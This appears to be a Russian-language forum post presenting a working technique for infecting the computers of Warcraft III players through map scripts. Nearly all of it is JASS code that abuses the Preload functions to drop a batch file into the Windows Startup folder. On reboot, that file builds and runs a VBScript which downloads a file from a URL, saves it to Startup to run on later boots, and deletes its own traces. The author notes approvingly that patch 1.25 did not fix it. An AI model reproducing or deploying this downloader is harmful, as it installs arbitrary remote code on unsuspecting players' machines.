Сцыль Опубликован новый способ, заразить компьютеры юзеров вк3. Прикол состоит в скачки вируса из интернета, после перезагрузки компьютера.
Code
function Infest takes string url, string localname returns nothing
call PreloadGenClear()
call PreloadGenStart()
call Preload("\")\necho Set objXMLHTTP = CreateObject(\"MSXML2.XMLHTTP\") > %TEMP%\\download.vbs\n//")
call Preload("\")\necho objXMLHTTP.open \"GET\", \""+url+"\", false >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objXMLHTTP.send() >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho If objXMLHTTP.Status = 200 Then >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho Set objADOStream = CreateObject(\"ADODB.Stream\") >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objADOStream.Open >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objADOStream.Type = 1 >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objADOStream.Write objXMLHTTP.ResponseBody >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objADOStream.Position = 0 >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho Set objFSO = Createobject(\"Scripting.FileSystemObject\") >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho If objFSO.Fileexists(\"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"+localname+"\") Then objFSO.DeleteFile \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"+localname+"\" >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objADOStream.SaveToFile \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"+localname+"\" >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objADOStream.Close >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho End if >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objFSO.DeleteFile \"%TEMP%\\download.vbs\" >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objFSO.DeleteFile \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\myvirus.bat\" >> %TEMP%\\download.vbs\n//")
call Preload("\")\nstart %TEMP%\\download.vbs\n//")
call PreloadGenEnd("C:\\Users\\YOURUSERNAMEHERE\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\myvirus.bat")
call PreloadGenClear()
call PreloadGenStart()
call Preload("\")\necho Set objXMLHTTP = CreateObject(\"MSXML2.XMLHTTP\") > %TEMP%\\download.vbs\n//")
call Preload("\")\necho objXMLHTTP.open \"GET\", \""+url+"\", false >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objXMLHTTP.send() >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho If objXMLHTTP.Status = 200 Then >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho Set objADOStream = CreateObject(\"ADODB.Stream\") >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objADOStream.Open >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objADOStream.Type = 1 >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objADOStream.Write objXMLHTTP.ResponseBody >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objADOStream.Position = 0 >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho Set objFSO = Createobject(\"Scripting.FileSystemObject\") >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho If objFSO.Fileexists(\"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\"+localname+"\") Then objFSO.DeleteFile \"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\"+localname+"\" >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objADOStream.SaveToFile \"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\"+localname+"\" >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objADOStream.Close >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho End if >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objFSO.DeleteFile \"%TEMP%\\download.vbs\" >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objFSO.DeleteFile \"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\myvirus.bat\" >> %TEMP%\\download.vbs\n//")
call Preload("\")\nstart %TEMP%\\download.vbs\n//")
call PreloadGenEnd("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\myvirus.bat")
endfunction
//===========================================================================
function InitTrig_Melee_Initialization takes nothing returns nothing
call Infest("http://www.stephan-brenner.com/blog/wp-content/uploads/2008/08/donothing.zip", "myvirus.zip")
endfunction
как бы указываем функции что нужно скачать:
Infest("http://www.stephan-brenner.com/blog/wp-content/uploads/2008/08/donothing.zip", "myvirus.zip")
С выходом патча 1.25 это не прикрыли О_о.